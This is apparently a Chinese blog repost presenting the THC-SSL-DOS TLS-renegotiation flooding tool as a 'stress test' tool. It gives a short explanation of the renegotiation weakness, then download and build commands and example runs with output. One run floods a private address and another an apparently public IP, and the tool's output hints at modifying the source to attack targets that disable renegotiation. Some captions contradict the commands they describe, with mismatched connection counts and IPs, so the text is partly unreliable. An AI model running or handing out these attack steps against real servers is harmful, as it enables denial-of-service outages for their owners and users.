thc-ssl-dos 压力测试工具
Posted a1d4m
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了thc-ssl-dos 压力测试工具相关的知识,希望对你有一定的参考价值。
德国黑客组织“The Hacker’s Choice”发布了工具THC SSL DOS,与传统DDoS工具不同的是,只需要一台执行单一攻击的电脑就能迅速消耗服务器资源,造成服务器拒绝服务。 这个攻击方式的本质是消耗服务器的CPU资源,在协商加密算法的时候服务器CPU的开销是客户端的 15 倍左右。而Renegotiating机制让攻击者可以在一个TCP连接中不停的快速重新协商,如果建立多个连接则服务端的压力更为可怕,而且这种攻击建立的连接数很少导致难以被察觉。从漏洞形成原因中,我们看到 Renegotiating机制可以让攻击者在一个TCP连接中不停的快速重新协商,由此可知,我们可以通过禁用Renegotiating机制来实现延缓此类拒绝攻击。但是其只能相对延缓,仍然不能彻底解决问题。如果通过客户端模拟多次请求连接,则依然会出现服务器端消耗资源过大的情况。由于德国黑客组织提供的工具THC SSL DOS目前只针对Renegotiations Enabled的情况.
0x01 下载安装
wget https://github.com/vanhauser-thc/THC-Archive/blob/master/Exploits/thc-ssl-dos-1.4.tar.gz tar zxvf thc-ssl-dos-1.4.tar.gz cd thc-ssl-dos-1.4 ./configure && make
#使用帮助
[email protected]:~# thc-ssl-dos -h ______________ ___ _________ \\__ ___/ | \\_ ___ | | / ~ / / | | Y / \\____ |____| \\___|_ / \\______ / / / http://www.thc.org Twitter @hackerschoice Greetingz: the french underground ./thc-ssl-dos [options] -h help -l Limit parallel connections [default: 400]
0x02 使用示例
使用100 连接(-l 100), 对目标IP(192.168.1.208)及其端口(443)进行泛洪攻击。
[email protected]:~# thc-ssl-dos -l 500 192.168.1.208 443 --accept \\__ ___/ | \\_ ___ | | / ~ / / | | Y / \\____ |____| \\___|_ / \\______ / / / http://www.thc.org Twitter @hackerschoice Greetingz: the french underground Waiting for script kiddies to piss off................ The force is with those who read the source... Handshakes 0 [0.00 h/s], 1 Conn, 0 Err Handshakes 2 [2.90 h/s], 6 Conn, 0 Err Handshakes 25 [22.42 h/s], 13 Conn, 0 Err Handshakes 70 [43.97 h/s], 20 Conn, 0 Err Handshakes 125 [56.51 h/s], 27 Conn, 0 Err Handshakes 185 [62.09 h/s], 33 Conn, 0 Err Handshakes 262 [74.56 h/s], 41 Conn, 0 Err Handshakes 365 [104.93 h/s], 47 Conn, 0 Err Handshakes 496 [131.23 h/s], 54 Conn, 0 Err
使用100 连接(-l 100), 对目标IP(111.13.101.208)及其端口(443)进行泛洪攻击。
[email protected]:~# thc-ssl-dos -l 500 183.222.100.112 443 --accept ______________ ___ _________ \\__ ___/ | \\_ ___ | | / ~ / / | | Y / \\____ |____| \\___|_ / \\______ / / / http://www.thc.org Twitter @hackerschoice Greetingz: the french underground Waiting for script kiddies to piss off................ The force is with those who read the source... Handshakes 0 [0.00 h/s], 1 Conn, 0 Err ERROR: Target has disabled renegotiations. Use your own skills to modify the source to test/attack the target [hint: TCP reconnect for every handshake].
以上是关于thc-ssl-dos 压力测试工具的主要内容,如果未能解决你的问题,请参考以下文章